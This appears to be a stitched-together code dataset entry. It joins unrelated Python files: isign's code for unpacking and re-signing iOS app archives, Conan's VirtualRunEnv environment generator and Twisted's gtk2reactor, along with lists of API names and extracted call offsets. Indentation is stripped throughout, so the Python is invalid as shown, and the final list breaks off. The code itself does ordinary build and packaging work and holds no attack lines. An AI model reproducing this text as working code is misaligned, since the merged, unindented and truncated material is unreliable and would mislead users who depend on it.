if helper_name not in helper_paths or helper_paths[helper_name] is None:
# note, find_executable returns None is not found
# in other words, we keep retrying until found
helper_paths[helper_name] = spawn.find_executable(helper_name)
log.debug("got executable {} for {}".format(helper_paths[helper_name],
helper_name))
return helper_paths[helper_name]
def make_temp_dir():
return tempfile.mkdtemp(prefix="isign-")
def get_watchkit_paths(root_bundle_path):
""" collect sub-bundles of this bundle that have watchkit """
# typical structure:
#
# app_bundle
# ...
# some_directory
# watchkit_extension <-- this is the watchkit bundle
# Info.plist
# watchkit_bundle <-- this is the part that runs on the Watch
# Info.plist <-- WKWatchKitApp=True
#
watchkit_paths = []
for path, _, _ in os.walk(root_bundle_path):
if path == root_bundle_path:
continue
try:
bundle = Bundle(path)
except NotMatched:
# this directory is not a bundle
continue
if bundle.info.get('WKWatchKitApp') is True:
# get the *containing* bundle
watchkit_paths.append(dirname(path))
return watchkit_paths
def process_watchkit(root_bundle_path, should_remove=False):
""" Unfortunately, we currently can't sign WatchKit. If you don't
care about watchkit functionality, it is
generally harmless to remove it, so that's the default.
Remove when https://github.com/saucelabs/isign/issues/20 is fixed """
watchkit_paths = get_watchkit_paths(root_bundle_path)
if len(watchkit_paths) > 0:
if should_remove:
for path in watchkit_paths:
log.warning("Removing WatchKit bundle {}".format(path))
shutil.rmtree(path)
else:
raise NotSignable("Cannot yet sign WatchKit bundles")
class Archive(object):
__metaclass__ = abc.ABCMeta
# we use abc.abstractmethod throughout because there are certain class
# methods we want to ensure are implemented.
@abc.abstractmethod
def unarchive_to_temp(self):
""" Unarchive and copy to a temp directory """
pass
@abc.abstractmethod
def archive(cls, path, output_path):
""" Archive a directory to an output path """
pass
@abc.abstractmethod
def get_info(cls, path):
""" Obtain app metadata from Info.plist without unarchiving """
pass
@abc.abstractmethod
def precheck(cls, path):
""" Check if this is, in fact, an archive of this type """
pass
@abc.abstractmethod
def find_bundle_dir(cls, path):
""" Locate the directory of the main app (aka bundle) """
pass
class AppArchive(Archive):
""" The simplest form of archive -- a naked App Bundle, with no extra directory structure,
compression, etc """
@classmethod
def find_bundle_dir(cls, path):
""" Included for similarity with the zipped archive classes. In this case, the bundle dir
*is* the directory """
return path
@classmethod
def _get_plist_path(cls, path):
return join(cls.find_bundle_dir(path), "Info.plist")
@classmethod
def get_info(cls, path):
return biplist.readPlist(cls._get_plist_path(path))
@classmethod
def precheck(cls, path):
if not isdir(path):
return False
if not os.path.exists(cls._get_plist_path(path)):
return False
plist = cls.get_info(path)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def archive(cls, path, output_path):
if exists(output_path):
shutil.rmtree(output_path)
shutil.move(path, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
def __init__(self, path):
self.path = path
self.relative_bundle_dir = '.'
self.bundle_info = self.get_info(self.path)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir)
shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already
shutil.copytree(self.path, containing_dir)
process_watchkit(containing_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, '.', self.__class__)
class AppZipArchive(Archive):
""" Just like an app, except it's zipped up, and when repackaged,
should be re-zipped. """
app_dir_pattern = r'^([^/]+\.app/).*$'
extensions = ['.zip']
helpers = ['zip', 'unzip']
@classmethod
def is_helpers_present(cls):
""" returns False if any of our helper apps wasn't found in class init """
is_present = True
for helper_name in cls.helpers:
if get_helper(helper_name) is None:
log.error("missing helper for class {}: {}".format(cls.__name__, helper_name))
is_present = False
break
return is_present
@classmethod
def is_archive_extension_match(cls, path):
""" does this path have the right extension """
log.debug('extension match')
for extension in cls.extensions:
log.debug('extension match: %s', extension)
if path.endswith(extension):
return True
return False
@classmethod
def find_bundle_dir(cls, zipfile_obj):
relative_bundle_dir = None
apps = set()
file_list = zipfile_obj.namelist()
for file_name in file_list:
matched = re.match(cls.app_dir_pattern, file_name)
if matched:
apps.add(matched.group(1))
if len(apps) == 1:
log.debug("found one app")
relative_bundle_dir = apps.pop()
elif len(apps) > 1:
log.warning('more than one app found in archive')
else:
log.warning('no apps found in archive')
return relative_bundle_dir
@classmethod
def _get_plist_path(cls, relative_bundle_dir):
return join(relative_bundle_dir, "Info.plist")
@classmethod
def precheck(cls, path):
""" Checks if an archive looks like this kind of app. Have to examine
within the zipfile, b/c we don't want to make temp dirs just yet. This
recapitulates a very similar precheck in the Bundle class """
if not isfile(path):
return False
if not cls.is_helpers_present():
raise MissingHelpers("helpers not present")
is_native = False
log.debug('precheck')
log.debug('path: %s', path)
if (cls.is_archive_extension_match(path) and
zipfile.is_zipfile(path)):
log.debug("this is an archive, and a zipfile")
zipfile_obj = zipfile.ZipFile(path)
relative_bundle_dir = cls.find_bundle_dir(zipfile_obj)
if relative_bundle_dir is not None:
plist_path = cls._get_plist_path(relative_bundle_dir)
if plist_path not in zipfile_obj.namelist():
return False
plist = cls.get_info(relative_bundle_dir, zipfile_obj)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def get_info(cls, relative_bundle_dir, zipfile_obj):
plist_path = cls._get_plist_path(relative_bundle_dir)
plist_bytes = zipfile_obj.read(plist_path)
return biplist.readPlistFromString(plist_bytes)
def __init__(self, path):
self.path = path
zipfile_obj = zipfile.ZipFile(path)
self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj)
self.bundle_info = self.get_info(self.relative_bundle_dir,
zipfile_obj)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir])
app_dir = abspath(join(containing_dir, self.relative_bundle_dir))
process_watchkit(app_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__)
@classmethod
def archive(cls, containing_dir, output_path):
""" archive this up into a zipfile. Note this is a classmethod, because
the caller will use us on a temp directory somewhere """
# the temp file is necessary because zip always adds ".zip" if it
# does not have an extension. But we want to respect the desired
# output_path's extension, which could be ".ipa" or who knows.
# So we move it to the output_path later.
#
# We also do a little dance with making another temp directory just
        # to construct the zip file. This is the best way to ensure an unused
# filename. Also, `zip` won't overwrite existing files, so this is safer.
temp_zip_dir = None
try:
# need to chdir and use relative paths, because zip is stupid
temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-")
temp_zip_file = join(temp_zip_dir, 'temp.zip')
call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir)
shutil.move(temp_zip_file, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
finally:
if temp_zip_dir is not None and isdir(temp_zip_dir):
shutil.rmtree(temp_zip_dir)
class IpaArchive(AppZipArchive):
""" IPA is Apple's standard for distributing apps. Much like an AppZip,
but slightly different paths """
extensions = ['.ipa']
app_dir_pattern = r'^(Payload/[^/]+\.app/).*$'
class UncompressedArchive(object):
""" This just keeps track of some state with an unzipped app archive and
how to re-zip it back up once re-signed. The bundle is located somewhere
inside the containing directory, but might be a few directories down, like in
a ContainingDir/Payload/something.app
This class is also useful if you have an app that's already unzipped and
you want to sign it. """
def __init__(self, path, relative_bundle_dir, archive_class):
""" Path is the "Containing dir", the dir at the root level of the unzipped archive
(or the dir itself, in the case of an AppArchive archive)
relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app
archive class is the kind of archive this was (Ipa, etc.) """
self.path = path
self.relative_bundle_dir = relative_bundle_dir
self.archive_class = archive_class
bundle_path = normpath(join(path, relative_bundle_dir))
self.bundle = App(bundle_path)
def archive(self, output_path):
""" Re-zip this back up, or simply copy it out, depending on what the
original archive class did """
self.archive_class.archive(self.path, output_path)
def clone(self, target_path):
""" Copy the uncompressed archive somewhere else, return initialized
UncompressedArchive """
shutil.copytree(self.path, target_path)
return self.__class__(target_path,
self.relative_bundle_dir,
self.archive_class)
def remove(self):
# the containing dir might be gone already b/c AppArchive simply moves
# it to the desired target when done
if exists(self.path) and isdir(self.path):
log.debug('removing ua: %s', self.path)
shutil.rmtree(self.path)
def archive_factory(path):
""" Guess what kind of archive we are dealing with, return an
archive object. Returns None if path did not match any archive type """
archive = None
for cls in [IpaArchive, AppZipArchive, AppArchive]:
if cls.precheck(path):
archive = cls(path)
log.debug("File %s matched as %s", path, cls.__name__)
break
return archive
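# archive_factory tries each archive type's precheck in order and returns the first match:
# an IPA, a zipped .app bundle, or a bare .app directory; None if nothing matches.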
def view(input_path):
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotMatched('No matching archive type found')
ua = archive.unarchive_to_temp()
bundle_info = ua.bundle.info
finally:
if ua is not None:
ua.remove()
return bundle_info
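# Hedged usage sketch of view(): it only inspects the bundle, it does not sign.
# The path below is a hypothetical placeholder.
#
# info = view('/tmp/MyApp.ipa')
# print(info.get('CFBundleIdentifier'))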
def resign(input_path,
certificate,
key,
apple_cert,
provisioning_profile,
output_path,
info_props=None,
alternate_entitlements_path=None):
""" Unified interface to extract any kind of archive from
a temporary file, resign it with these credentials,
and create a similar archive for that resigned app """
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
log.debug('Signing with apple_cert: {}'.format(apple_cert))
log.debug('Signing with key: {}'.format(key))
log.debug('Signing with certificate: {}'.format(certificate))
log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile))
signer = Signer(signer_cert_file=certificate,
signer_key_file=key,
apple_cert_file=apple_cert)
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotSignable('No matching archive type found')
ua = archive.unarchive_to_temp()
if info_props:
# Override info.plist props of the parent bundle
ua.bundle.update_info_props(info_props)
ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path)
bundle_info = ua.bundle.info
ua.archive(output_path)
except NotSignable as e:
msg = "Not signable: <{0}>: {1}\n".format(input_path, e)
log.info(msg)
raise
finally:
if ua is not None:
ua.remove()
return bundle_info
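# Hedged usage sketch of resign() above; every path below is a hypothetical
# placeholder for real credential and app files.
#
# info = resign('/tmp/MyApp.ipa',
#               certificate='/tmp/certs/signer.pem',
#               key='/tmp/certs/signer.key.pem',
#               apple_cert='/tmp/certs/apple_ca.pem',
#               provisioning_profile='/tmp/certs/profile.mobileprovision',
#               output_path='/tmp/MyApp-resigned.ipa')
# print(info.get('CFBundleIdentifier'))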
| [
"logging.getLogger",
"exceptions.MissingHelpers",
"signer.Signer",
"zipfile.ZipFile",
"exceptions.NotMatched",
"os.walk",
"os.path.exists",
"shutil.move",
"bundle.is_info_plist_native",
"bundle.Bundle",
"os.path.isdir",
"biplist.readPlistFromString",
"exceptions.NotSignable",
"re.match",
"os.path.isfile",
"os.path.dirname",
"tempfile.mkdtemp",
"zipfile.is_zipfile",
"distutils.spawn.find_executable",
"os.path.join",
"bundle.App",
"shutil.copytree",
"shutil.rmtree"
] | [((706, 733), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (723, 733), False, 'import logging\n'), ((1296, 1329), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-"""'}), "(prefix='isign-')\n", (1312, 1329), False, 'import tempfile\n'), ((1790, 1815), 'os.walk', 'os.walk', (['root_bundle_path'], {}), '(root_bundle_path)\n', (1797, 1815), False, 'import os\n'), ((14421, 14511), 'signer.Signer', 'Signer', ([], {'signer_cert_file': 'certificate', 'signer_key_file': 'key', 'apple_cert_file': 'apple_cert'}), '(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=\n apple_cert)\n', (14427, 14511), False, 'from signer import Signer\n'), ((1053, 1087), 'distutils.spawn.find_executable', 'spawn.find_executable', (['helper_name'], {}), '(helper_name)\n', (1074, 1087), False, 'from distutils import spawn\n'), ((4526, 4553), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (4546, 4553), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((4702, 4721), 'os.path.exists', 'exists', (['output_path'], {}), '(output_path)\n', (4708, 4721), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4770, 4800), 'shutil.move', 'shutil.move', (['path', 'output_path'], {}), '(path, output_path)\n', (4781, 4800), False, 'import shutil\n'), ((5179, 5208), 'shutil.rmtree', 'shutil.rmtree', (['containing_dir'], {}), '(containing_dir)\n', (5192, 5208), False, 'import shutil\n'), ((5267, 5309), 'shutil.copytree', 'shutil.copytree', (['self.path', 'containing_dir'], {}), '(self.path, containing_dir)\n', (5282, 5309), False, 'import shutil\n'), ((7158, 7197), 'os.path.join', 'join', (['relative_bundle_dir', '"""Info.plist"""'], {}), "(relative_bundle_dir, 'Info.plist')\n", (7162, 7197), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((8621, 8661), 'biplist.readPlistFromString', 'biplist.readPlistFromString', (['plist_bytes'], {}), '(plist_bytes)\n', (8648, 8661), False, 'import biplist\n'), ((8740, 8761), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (8755, 8761), False, 'import zipfile\n'), ((11904, 11920), 'bundle.App', 'App', (['bundle_path'], {}), '(bundle_path)\n', (11907, 11920), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((12294, 12333), 'shutil.copytree', 'shutil.copytree', (['self.path', 'target_path'], {}), '(self.path, target_path)\n', (12309, 12333), False, 'import shutil\n'), ((13222, 13240), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (13228, 13240), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((14064, 14082), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (14070, 14082), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((1909, 1921), 'bundle.Bundle', 'Bundle', (['path'], {}), '(path)\n', (1915, 1921), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((2805, 2852), 'exceptions.NotSignable', 'NotSignable', (['"""Cannot yet sign WatchKit bundles"""'], {}), "('Cannot yet sign WatchKit bundles')\n", (2816, 2852), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((4350, 4361), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\n', (4355, 4361), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4735, 4761), 'shutil.rmtree', 'shutil.rmtree', (['output_path'], {}), 
'(output_path)\n', (4748, 4761), False, 'import shutil\n'), ((6664, 6704), 're.match', 're.match', (['cls.app_dir_pattern', 'file_name'], {}), '(cls.app_dir_pattern, file_name)\n', (6672, 6704), False, 'import re\n'), ((7495, 7507), 'os.path.isfile', 'isfile', (['path'], {}), '(path)\n', (7501, 7507), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((7593, 7630), 'exceptions.MissingHelpers', 'MissingHelpers', (['"""helpers not present"""'], {}), "('helpers not present')\n", (7607, 7630), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((7792, 7816), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path'], {}), '(path)\n', (7810, 7816), False, 'import zipfile\n'), ((7904, 7925), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (7919, 7925), False, 'import zipfile\n'), ((9129, 9175), 'os.path.join', 'join', (['containing_dir', 'self.relative_bundle_dir'], {}), '(containing_dir, self.relative_bundle_dir)\n', (9133, 9175), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10199, 10236), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-zip-"""'}), "(prefix='isign-zip-')\n", (10215, 10236), False, 'import tempfile\n'), ((10265, 10295), 'os.path.join', 'join', (['temp_zip_dir', '"""temp.zip"""'], {}), "(temp_zip_dir, 'temp.zip')\n", (10269, 10295), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10393, 10432), 'shutil.move', 'shutil.move', (['temp_zip_file', 'output_path'], {}), '(temp_zip_file, output_path)\n', (10404, 10432), False, 'import shutil\n'), ((11849, 11880), 'os.path.join', 'join', (['path', 'relative_bundle_dir'], {}), '(path, relative_bundle_dir)\n', (11853, 11880), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12641, 12658), 'os.path.exists', 'exists', (['self.path'], {}), '(self.path)\n', (12647, 12658), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12663, 12679), 'os.path.isdir', 'isdir', (['self.path'], {}), '(self.path)\n', (12668, 12679), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12745, 12769), 'shutil.rmtree', 'shutil.rmtree', (['self.path'], {}), '(self.path)\n', (12758, 12769), False, 'import shutil\n'), ((13438, 13482), 'exceptions.NotMatched', 'NotMatched', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (13448, 13482), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((14686, 14731), 'exceptions.NotSignable', 'NotSignable', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (14697, 14731), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((2144, 2157), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\n', (2151, 2157), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((2753, 2772), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (2766, 2772), False, 'import shutil\n'), ((8304, 8331), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (8324, 8331), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((10566, 10585), 'os.path.isdir', 'isdir', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10571, 10585), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10603, 10630), 'shutil.rmtree', 
'shutil.rmtree', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10616, 10630), False, 'import shutil\n')] |
from conan.tools.env import Environment
def runenv_from_cpp_info(conanfile, cpp_info):
""" return an Environment deducing the runtime information from a cpp_info
"""
dyn_runenv = Environment(conanfile)
if cpp_info is None: # This happens when the dependency is a private one = BINARY_SKIP
return dyn_runenv
if cpp_info.bin_paths: # cpp_info.exes is not defined yet
dyn_runenv.prepend_path("PATH", cpp_info.bin_paths)
# If it is a build_require this will be the build-os, otherwise it will be the host-os
if cpp_info.lib_paths:
dyn_runenv.prepend_path("LD_LIBRARY_PATH", cpp_info.lib_paths)
dyn_runenv.prepend_path("DYLD_LIBRARY_PATH", cpp_info.lib_paths)
if cpp_info.framework_paths:
dyn_runenv.prepend_path("DYLD_FRAMEWORK_PATH", cpp_info.framework_paths)
return dyn_runenv
class VirtualRunEnv:
""" captures the conanfile environment that is defined from its
dependencies, and also from profiles
"""
def __init__(self, conanfile):
self._conanfile = conanfile
def environment(self):
""" collects the runtime information from dependencies. For normal libraries should be
very occasional
"""
runenv = Environment(self._conanfile)
# FIXME: Missing profile info
# FIXME: Cache value?
host_req = self._conanfile.dependencies.host
test_req = self._conanfile.dependencies.test
for _, dep in list(host_req.items()) + list(test_req.items()):
if dep.runenv_info:
runenv.compose_env(dep.runenv_info)
runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info))
return runenv
def generate(self, auto_activate=False):
run_env = self.environment()
if run_env:
run_env.save_script("conanrunenv", auto_activate=auto_activate)
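# Hedged sketch of how a recipe could drive this generator from its generate()
# method; assumes `self` is a ConanFile whose dependencies are already resolved.
#
# def generate(self):
#     VirtualRunEnv(self).generate(auto_activate=True)  # writes the "conanrunenv" script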
| [
"conan.tools.env.Environment"
] | [((193, 215), 'conan.tools.env.Environment', 'Environment', (['conanfile'], {}), '(conanfile)\n', (204, 215), False, 'from conan.tools.env import Environment\n'), ((1243, 1271), 'conan.tools.env.Environment', 'Environment', (['self._conanfile'], {}), '(self._conanfile)\n', (1254, 1271), False, 'from conan.tools.env import Environment\n')] |
# -*- test-case-name: twisted.internet.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides support for Twisted to interact with the glib/gtk2
mainloop.
In order to use this support, simply do the following::
| from twisted.internet import gtk2reactor
| gtk2reactor.install()
Then use twisted.internet APIs as usual. The other methods here are not
intended to be called directly.
When installing the reactor, you can choose whether to use the glib
event loop or the GTK+ event loop which is based on it but adds GUI
integration.
"""
# System Imports
import sys, signal
from zope.interface import implements
try:
if not hasattr(sys, 'frozen'):
# Don't want to check this for py2exe
import pygtk
pygtk.require('2.0')
except (ImportError, AttributeError):
pass # maybe we're using pygtk before this hack existed.
import gobject
if hasattr(gobject, "threads_init"):
# recent versions of python-gtk expose this. python-gtk=2.4.1
# (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping
# glib-2.2.3) does not.
gobject.threads_init()
# Twisted Imports
from twisted.python import log, runtime, failure
from twisted.python.compat import set
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import main, base, posixbase, error, selectreactor
POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL
# glib's iochannel sources won't tell us about any events that we haven't
# asked for, even if those events aren't sensible inputs to the poll()
# call.
INFLAGS = gobject.IO_IN | POLL_DISCONNECTED
OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED
def _our_mainquit():
# XXX: gtk.main_quit() (which is used for crash()) raises an exception if
# gtk.main_level() == 0; however, all the tests freeze if we use this
# function to stop the reactor. what gives? (I believe this may have been
# a stupid mistake where I forgot to import gtk here... I will remove this
# comment if the tests pass)
import gtk
if gtk.main_level():
gtk.main_quit()
class Gtk2Reactor(posixbase.PosixReactorBase):
"""
GTK+-2 event loop reactor.
@ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk
watch handles.
@ivar _reads: A set of L{FileDescriptor} instances currently monitored for
reading.
@ivar _writes: A set of L{FileDescriptor} instances currently monitored for
writing.
@ivar _simtag: A gtk timeout handle for the next L{simulate} call.
"""
implements(IReactorFDSet)
def __init__(self, useGtk=True):
self._simtag = None
self._reads = set()
self._writes = set()
self._sources = {}
posixbase.PosixReactorBase.__init__(self)
# pre 2.3.91 the glib iteration and mainloop functions didn't release
# global interpreter lock, thus breaking thread and signal support.
if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk:
self.context = gobject.main_context_default()
self.__pending = self.context.pending
self.__iteration = self.context.iteration
self.loop = gobject.MainLoop()
self.__crash = self.loop.quit
self.__run = self.loop.run
else:
import gtk
self.__pending = gtk.events_pending
self.__iteration = gtk.main_iteration
self.__crash = _our_mainquit
self.__run = gtk.main
if runtime.platformType == 'posix':
def _handleSignals(self):
# Let the base class do its thing, but pygtk is probably
# going to stomp on us so go beyond that and set up some
# signal handling which pygtk won't mess with. This would
# be better done by letting this reactor select a
# different implementation of installHandler for
# _SIGCHLDWaker to use. Then, at least, we could fall
# back to our extension module. See #4286.
from twisted.internet.process import reapAllProcesses as _reapAllProcesses
base._SignalReactorMixin._handleSignals(self)
signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses))
if getattr(signal, "siginterrupt", None) is not None:
signal.siginterrupt(signal.SIGCHLD, False)
# Like the base, reap processes now in case a process
# exited before the handlers above were installed.
_reapAllProcesses()
# The input_add function in pygtk1 checks for objects with a
# 'fileno' method and, if present, uses the result of that method
# as the input source. The pygtk2 input_add does not do this. The
# function below replicates the pygtk1 functionality.
# In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and
# g_io_add_watch() takes different condition bitfields than
# gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this
# bug.
def input_add(self, source, condition, callback):
if hasattr(source, 'fileno'):
# handle python objects
def wrapper(source, condition, real_s=source, real_cb=callback):
return real_cb(real_s, condition)
return gobject.io_add_watch(source.fileno(), condition, wrapper)
else:
return gobject.io_add_watch(source, condition, callback)
def _add(self, source, primary, other, primaryFlag, otherFlag):
"""
Add the given L{FileDescriptor} for monitoring either for reading or
writing. If the file is already monitored for the other operation, we
delete the previous registration and re-register it for both reading
and writing.
"""
if source in primary:
return
flags = primaryFlag
if source in other:
gobject.source_remove(self._sources[source])
flags |= otherFlag
self._sources[source] = self.input_add(source, flags, self.callback)
primary.add(source)
def addReader(self, reader):
"""
Add a L{FileDescriptor} for monitoring of data available to read.
"""
self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS)
def addWriter(self, writer):
"""
Add a L{FileDescriptor} for monitoring ability to write data.
"""
self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS)
def getReaders(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for reading.
"""
return list(self._reads)
def getWriters(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for writing.
"""
return list(self._writes)
def removeAll(self):
"""
Remove monitoring for all registered L{FileDescriptor}s.
"""
return self._removeAll(self._reads, self._writes)
def _remove(self, source, primary, other, flags):
"""
Remove monitoring the given L{FileDescriptor} for either reading or
writing. If it's still monitored for the other operation, we
re-register the L{FileDescriptor} for only that operation.
"""
if source not in primary:
return
gobject.source_remove(self._sources[source])
primary.remove(source)
if source in other:
self._sources[source] = self.input_add(
source, flags, self.callback)
else:
self._sources.pop(source)
def removeReader(self, reader):
"""
Stop monitoring the given L{FileDescriptor} for reading.
"""
self._remove(reader, self._reads, self._writes, OUTFLAGS)
def removeWriter(self, writer):
"""
Stop monitoring the given L{FileDescriptor} for writing.
"""
self._remove(writer, self._writes, self._reads, INFLAGS)
doIterationTimer = None
def doIterationTimeout(self, *args):
self.doIterationTimer = None
return 0 # auto-remove
def doIteration(self, delay):
# flush some pending events, return if there was something to do
# don't use the usual "while self.context.pending(): self.context.iteration()"
# idiom because lots of IO (in particular test_tcp's
# ProperlyCloseFilesTestCase) can keep us from ever exiting.
log.msg(channel='system', event='iteration', reactor=self)
if self.__pending():
self.__iteration(0)
return
# nothing to do, must delay
if delay == 0:
return # shouldn't delay, so just return
self.doIterationTimer = gobject.timeout_add(int(delay * 1000),
self.doIterationTimeout)
# This will either wake up from IO or from a timeout.
self.__iteration(1) # block
# note: with the .simulate timer below, delays > 0.1 will always be
# woken up by the .simulate timer
if self.doIterationTimer:
# if woken by IO, need to cancel the timer
gobject.source_remove(self.doIterationTimer)
self.doIterationTimer = None
def crash(self):
posixbase.PosixReactorBase.crash(self)
self.__crash()
def run(self, installSignalHandlers=1):
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
if self._started:
self.__run()
def _doReadOrWrite(self, source, condition, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost()),
}):
why = None
inRead = False
if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN):
if source in self._reads:
why = main.CONNECTION_DONE
inRead = True
else:
why = main.CONNECTION_LOST
else:
try:
if condition & gobject.IO_IN:
why = source.doRead()
inRead = True
if not why and condition & gobject.IO_OUT:
# if doRead caused connectionLost, don't call doWrite
# if doRead is doWrite, don't call it again.
if not source.disconnected:
why = source.doWrite()
except:
why = sys.exc_info()[1]
log.msg('Error In %s' % source)
log.deferr()
if why:
self._disconnectSelectable(source, why, inRead)
def callback(self, source, condition):
log.callWithLogger(source, self._doReadOrWrite, source, condition)
self.simulate() # fire Twisted timers
return 1 # 1=don't auto-remove the source
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.runUntilCurrent()
timeout = min(self.timeout(), 0.1)
if timeout is None:
timeout = 0.1
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
class PortableGtkReactor(selectreactor.SelectReactor):
"""
Reactor that works on Windows.
Sockets aren't supported by GTK+'s input_add on Win32.
"""
_simtag = None
def crash(self):
selectreactor.SelectReactor.crash(self)
import gtk
# mainquit is deprecated in newer versions
if gtk.main_level():
if hasattr(gtk, 'main_quit'):
gtk.main_quit()
else:
gtk.mainquit()
def run(self, installSignalHandlers=1):
import gtk
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
# mainloop is deprecated in newer versions
if hasattr(gtk, 'main'):
gtk.main()
else:
gtk.mainloop()
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.iterate()
timeout = min(self.timeout(), 0.1)
if timeout is None:
timeout = 0.1
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
def install(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
@param useGtk: should glib rather than GTK+ event loop be
used (this will be slightly faster but does not support GUI).
"""
reactor = Gtk2Reactor(useGtk)
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
def portableInstall(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
"""
reactor = PortableGtkReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
if runtime.platform.getType() != 'posix':
install = portableInstall
__all__ = ['install']
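# Hedged usage sketch, mirroring the module docstring: install the reactor
# before anything else imports twisted.internet.reactor.
#
# from twisted.internet import gtk2reactor
# gtk2reactor.install()            # or portableInstall() from this module on Windows
# from twisted.internet import reactor
# reactor.run()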
| [
"twisted.internet.posixbase.PosixReactorBase.__init__",
"twisted.internet.process.reapAllProcesses",
"zope.interface.implements",
"signal.siginterrupt",
"sys.exc_info",
"twisted.python.log.deferr",
"twisted.python.runtime.platform.getType",
"twisted.internet.error.ConnectionDone",
"twisted.internet.posixbase.PosixReactorBase.crash",
"twisted.python.compat.set",
"gtk.main_level",
"gtk.mainquit",
"gtk.main_quit",
"gobject.threads_init",
"twisted.python.log.msg",
"pygtk.require",
